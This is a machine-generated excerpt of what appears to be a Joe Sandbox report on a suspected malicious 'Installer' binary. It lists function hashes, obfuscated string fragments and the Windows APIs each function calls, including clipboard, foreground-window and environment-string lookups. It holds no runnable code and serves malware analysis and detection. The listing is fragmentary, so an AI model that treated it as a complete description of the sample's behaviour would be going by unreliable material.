• Opcode ID: a5036223926f76e7a30bb82d8b41372fba638fb8ce1a419d4bb5bda1a50e89be
• Instruction ID: c78e23977c3e2a35fed25d62a8fd294347c45f883251edd20cfe32e08262873d
• Opcode Fuzzy Hash: a5036223926f76e7a30bb82d8b41372fba638fb8ce1a419d4bb5bda1a50e89be
• Instruction Fuzzy Hash: AFF0E2B09445D48BDB00CF7AAC593AA37A0EB56305F241975E112D72A1EB3898528B0D
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B2E9,?,00000001), ref: 0043EB72
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C74D
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
APIs
• GetForegroundWindow.USER32 ref: 0043ED37
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
APIs
• RtlFreeHeap.NTDLL(?,00000000), ref: 0043CB0B
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,B19801D9,004086F7,B4B7D921), ref: 0043CAD0
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
  • Part of subcall function 0043EBA0: LdrInitializeThunk.NTDLL(00441BF8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043EBCE
• FreeLibrary.KERNEL32(?), ref: 0041A269
• FreeLibrary.KERNEL32(?), ref: 0041A2DE
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: 2E'G$54+*$54+*$54+*$8I#K$8U:W$XY$~Q6S
• API String ID: 764372645-2390782495
                                                                                                                                                                                                                                                    • Opcode ID: 0f80e1662aea17d897eb7f5cc82f5f76a7864b0803524b2c06bda07c8fcedbb3
                                                                                                                                                                                                                                                    • Instruction ID: 2c3f929d4cabc55a225c70deac7f21d0ad3b9eba4449c3fe9de0e78d4448d8f9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f80e1662aea17d897eb7f5cc82f5f76a7864b0803524b2c06bda07c8fcedbb3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3982067460A3409FD714CB24D990BABBBE2EBC6314F18882DE58587352D779DC92CB4B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 54+*$A$S<.+$\xy>
                                                                                                                                                                                                                                                    • API String ID: 0-3685461857
                                                                                                                                                                                                                                                    • Opcode ID: 38d5dddfc1d7d73f8303f266aa0984ee0180c9c2ce3074419444b47f20e9dfdf
                                                                                                                                                                                                                                                    • Instruction ID: b9dae982806908fc93e9902a33def771db61ac40b6c91c0664327fad2570cd92
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38d5dddfc1d7d73f8303f266aa0984ee0180c9c2ce3074419444b47f20e9dfdf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 115212726183418BC725CF28C8A17ABB7E2FFD6314F18496EE4C58B391DB399846C746
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2058664381-0
                                                                                                                                                                                                                                                    • Opcode ID: 9ace8d3d66c656d27122584beaa275d741043033d7610bd44cbfd8939ce7624b
                                                                                                                                                                                                                                                    • Instruction ID: 5078fe84b0e2f8b0d482d572d4820ca8f51d2eda85a3955b293059345ad65239
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ace8d3d66c656d27122584beaa275d741043033d7610bd44cbfd8939ce7624b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B41D4F480C7819FD700AF78D14A36ABFE0AB16345F04853ED48587641D37DA659C797
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00428850
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 004288B5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID: A%g'$_\efg$efg
                                                                                                                                                                                                                                                    • API String ID: 237503144-2372333709
                                                                                                                                                                                                                                                    • Opcode ID: a7a1f39499a5e99c848ff68f033dae6045633c5ac20e702f25ecc2a0062ac25d
                                                                                                                                                                                                                                                    • Instruction ID: ccad30b6dcc476866ed8e691afcd1205d7334b7ec1782e1d821448a32adf35b5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7a1f39499a5e99c848ff68f033dae6045633c5ac20e702f25ecc2a0062ac25d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41A1ACB2E002688FEB148FA8DC917DEBBB1FB45304F5145B9D91AAB281DB3059468F94
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: o4i$$w=q$1c;m$5k5u$A$S<.+
                                                                                                                                                                                                                                                    • API String ID: 0-1763114429
                                                                                                                                                                                                                                                    • Opcode ID: da2264087117273adc8f8cbb7abf3b3369941c733713fa4ddd61a4a78f3232fe
                                                                                                                                                                                                                                                    • Instruction ID: afb31bd0c27c82544a17a6576629b60a2b4a96c899e5dad63360a4cbb890e339
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da2264087117273adc8f8cbb7abf3b3369941c733713fa4ddd61a4a78f3232fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4D1ADB55093808BD7348F29C4A17EBB7E1EFD6314F05896ED4CA8B351EB785901CB86
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: %751$./$4=/U$E]Qw$wNoL$j^h
                                                                                                                                                                                                                                                    • API String ID: 0-997366216
                                                                                                                                                                                                                                                    • Opcode ID: 9ad3b405c217e9d1e4c0f6edf70f746ac05b5820c8d0e78aa04361182b97f1d7
                                                                                                                                                                                                                                                    • Instruction ID: 7a5dc0394ecbf34ac9b8307d7efc7bae40aec903ea1c7f0c69f60aa070f276f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ad3b405c217e9d1e4c0f6edf70f746ac05b5820c8d0e78aa04361182b97f1d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12C19B7564C3444BD324EF6488502ABFBE39FC1304F19883DE4D5AB382D6B9C9168B8B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: )L$*+$@C$HR$pO
                                                                                                                                                                                                                                                    • API String ID: 0-3083683625
                                                                                                                                                                                                                                                    • Opcode ID: 0aaee39fcba311e15bc1f38c0aae4a491dfa01ec6e052e56f652e43bf11aa76a
                                                                                                                                                                                                                                                    • Instruction ID: 5fe24d867cb9075332fe1ade04ad22fabc6e99e6679ddeed31bd91dff5edfe56
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0aaee39fcba311e15bc1f38c0aae4a491dfa01ec6e052e56f652e43bf11aa76a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 637134B06493518BD310DF25E89166BBBF1EFD2360F58891DE4C18B391E7789505CB8B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: -
• API String ID: 0-2547889144
• Opcode ID: 6310d2c406e9cc477afe31215b7d1a469a2c990294c66a01fa1cb42ab7ab9bad
• Instruction ID: 2db9ac68f453c0b2d94bf9f393f819a8b1a8f76bd3cef0c41518664d486a93b6
• Opcode Fuzzy Hash: 6310d2c406e9cc477afe31215b7d1a469a2c990294c66a01fa1cb42ab7ab9bad
• Instruction Fuzzy Hash: B0F114766183529BD714CF29C8906ABB7E2EFC9310F08896DE8C587391EB38DD45C752
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: 54+*$7$:_A$gfff
• API String ID: 0-323440868
• Opcode ID: ef99c69aae7ebca8759eae803294edf467de6f070c2877fa02e645cc48d7660a
• Instruction ID: 974855a4ab02da3001828df224cdb3c791939bff7d675949acd43d199703548e
• Opcode Fuzzy Hash: ef99c69aae7ebca8759eae803294edf467de6f070c2877fa02e645cc48d7660a
• Instruction Fuzzy Hash: 5EB13972A142118BD328CF38CC527EBBAD6EBC5314F0A867DD885DB395DB78980687C5
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: *+$1>$bxB$OI
• API String ID: 0-1035774624
• Opcode ID: b638a3a3900de88040439206c35891a4249c7e51ff3c4424b8b62b3d3637280b
• Instruction ID: 2bcf0024169a31bcf5d17f9542290146e57be21ae5465408edeec82165f3d5e6
• Opcode Fuzzy Hash: b638a3a3900de88040439206c35891a4249c7e51ff3c4424b8b62b3d3637280b
• Instruction Fuzzy Hash: 3791ECB46083808FD734DF24E852BAFB7A1FB82314F44492DE5898B241DB789946CB5B
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: InitializeThunk
• String ID: 54+*$54+*$54+*$MnA
• API String ID: 2994545307-957495038
• Opcode ID: 8f06322f8e6d6c7ea759cd23599a080b87f48ffbe2650b3fb3614bfedb925110
• Instruction ID: dd597300f9b4ef6573e6ef65d23cc5c487566c46e2a7da0a635b7d7db396d5cc
• Opcode Fuzzy Hash: 8f06322f8e6d6c7ea759cd23599a080b87f48ffbe2650b3fb3614bfedb925110
• Instruction Fuzzy Hash: E261E97461D3808FD315CB3888907EBBBE5EB8A350F25896ED1D1C72A1D738D885CB5A
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: !&& $2"\\$v
• API String ID: 0-66690623
• Opcode ID: 4dfb5fb78e8a455e5ad835274cf3511fda185d48fb834496ef83a700337ad192
• Instruction ID: e9b17d7d6cb25fd7e8af81ca0dca0c33645f5d3503e302bb4264f03f34b07c3b
• Opcode Fuzzy Hash: 4dfb5fb78e8a455e5ad835274cf3511fda185d48fb834496ef83a700337ad192
• Instruction Fuzzy Hash: 62527B7450C3818FC725CF25C8506AFBFE1AF96314F088A6EE8D54B392D7398946CB56
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: InitializeThunk
• String ID: 54+*$54+*$54+*
• API String ID: 2994545307-26850336
• Opcode ID: a67e97fda4feb9dd47d5dd4a0776e3bc287d4b57f4707a9353eb73cb6bf7ee0f
• Instruction ID: d7f07654b581cdb91e5346d4e79727cc379c0b8875721e9d15300a6a5d61dc92
• Opcode Fuzzy Hash: a67e97fda4feb9dd47d5dd4a0776e3bc287d4b57f4707a9353eb73cb6bf7ee0f
• Instruction Fuzzy Hash: 0FD177357883009FDB14CB25C882A7BB7A2EBC9354F18A52EE5C557391C778EC06878B
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: F]EH$Uo#_$[:
• API String ID: 0-1241761701
• Opcode ID: d3126adfd973d3248ca04cd93e27acaf3fc7bc708df34f2fc2eacb6372e1e1a0
• Instruction ID: b3be92acc381a827a91cc0f17c6e37e2be9106d66737dd4d561d2fb3aa3361bd
• Opcode Fuzzy Hash: d3126adfd973d3248ca04cd93e27acaf3fc7bc708df34f2fc2eacb6372e1e1a0
• Instruction Fuzzy Hash: 3C7158B4A083A19BD3198B3994A033BBBE09F97305F58856EF4D68B381D67D8C04C756
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: F]EH$Uo#_$[:
• API String ID: 0-1241761701
• Opcode ID: 36fd720ed8d6823c32771bfe1625822d316a9a8a9853b2f702ca3dab545584eb
• Instruction ID: 2ffdbc668ff94129819068ea1ed793c8dcaee62cf96c99cff00229467904dbcf
• Opcode Fuzzy Hash: 36fd720ed8d6823c32771bfe1625822d316a9a8a9853b2f702ca3dab545584eb
• Instruction Fuzzy Hash: BF5168A4A093A18BD3188F2994A0337FFE09FE3305F58956EF4D68B381D67D8804C756
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: F]EH$Uo#_$[:
• API String ID: 0-1241761701
• Opcode ID: 4ffe94aedec0ee075d16d5ca1e3e2f6a888b7093a5e75b5c49b8c05ae89e53b4
• Instruction ID: 0de7b66c928a3350a22ba3e9d9bb6f9889ec970dbe198820fd9a8fcea16b9496
• Opcode Fuzzy Hash: 4ffe94aedec0ee075d16d5ca1e3e2f6a888b7093a5e75b5c49b8c05ae89e53b4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 785179B4A093A18BD3098B2994A033BFFE09FD3305F58955EF4D68B381D67D8804C756
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: F]EH$Uo#_$[:
                                                                                                                                                                                                                                                    • API String ID: 0-1241761701
                                                                                                                                                                                                                                                    • Opcode ID: 75d27e60beb243e9c3408e842da1e13c30d6f828246f723bff5a19cc79804c01
                                                                                                                                                                                                                                                    • Instruction ID: 61dd48889cf855c270f3eeb86a6ea88740ffcb6d6eea17eed08dc00024456671
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75d27e60beb243e9c3408e842da1e13c30d6f828246f723bff5a19cc79804c01
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 355166B0A093A18BD3088B2894A033BFFE09FD3305F58956EE4D68B381D67D8804C756
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ($0' :$g
                                                                                                                                                                                                                                                    • API String ID: 0-2894493355
                                                                                                                                                                                                                                                    • Opcode ID: 127e783f08fa03dc1526e31b0ee453c704f7bbf9130a5869e8a9e0373e6e0c28
                                                                                                                                                                                                                                                    • Instruction ID: 82fddf1245ea9785951fab6b19b0e18f29a6b2d5cfba79b1b40d0bceeec468ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 127e783f08fa03dc1526e31b0ee453c704f7bbf9130a5869e8a9e0373e6e0c28
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F651F26531D3D24BDB298F3598653FBBBE2DB93304F5C496DC0CA87282DB3984068796
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ($0' :$g
                                                                                                                                                                                                                                                    • API String ID: 0-2894493355
                                                                                                                                                                                                                                                    • Opcode ID: 60e313afede76628c7910cabc6e2c24f69d92bdb4d83de5ca37a98b6c8095f76
                                                                                                                                                                                                                                                    • Instruction ID: ab1398b02a8a7281b2a45260371c8ad29eb33f1a8b52771f88fa1d3f98cb6ccb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60e313afede76628c7910cabc6e2c24f69d92bdb4d83de5ca37a98b6c8095f76
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7341D37061C3D28ADB394F3494293FBBBE1DB93304F5849ADC0C987282DB394106879A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: ($0' :$g
                                                                                                                                                                                                                                                    • API String ID: 0-2894493355
                                                                                                                                                                                                                                                    • Opcode ID: b96d02e88c0a58c109baa3d55930f9ba5c7ef7b50bcf42591470675d5c739625
                                                                                                                                                                                                                                                    • Instruction ID: be085471faecc0e2517363bcce5a64cf4fe5eb468f05be4f0a344c56f6f7ae45
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b96d02e88c0a58c109baa3d55930f9ba5c7ef7b50bcf42591470675d5c739625
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9031F46021C3D28ADB394F3494593FBBBE1DB93304F98496EC0C987292CB394106CB5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: AL7$KNCI$X
                                                                                                                                                                                                                                                    • API String ID: 0-2162001628
                                                                                                                                                                                                                                                    • Opcode ID: 2d3aa0b5dc2908d3afa6b89691fa5862a8d4e30f209e389472789df3b9353774
                                                                                                                                                                                                                                                    • Instruction ID: c1efb55ec262374922805156c2cb0b218ab5fdccaf3554e53de449f270c0e8b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d3aa0b5dc2908d3afa6b89691fa5862a8d4e30f209e389472789df3b9353774
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0A9B011D3909BE350AF69969065FFBF8EF96320F502A2CFAD49B242C334C0018F46
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427B68
                                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00427C72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 237503144-0
                                                                                                                                                                                                                                                    • Opcode ID: 5a29734b277b2e9b8358fa5ecbf45429ecc3aeb30d586a3974802221ebf8515b
                                                                                                                                                                                                                                                    • Instruction ID: 247fa94026213c22a70afdfae02ba9db67c982c8a71b05e85d253056af3d2863
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a29734b277b2e9b8358fa5ecbf45429ecc3aeb30d586a3974802221ebf8515b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE324376A0C350CFD3108F29E88072EB7E1EF86314F19867DE99597391DB74E9018B8A
                                                                                                                                                                                                                                                    APIs
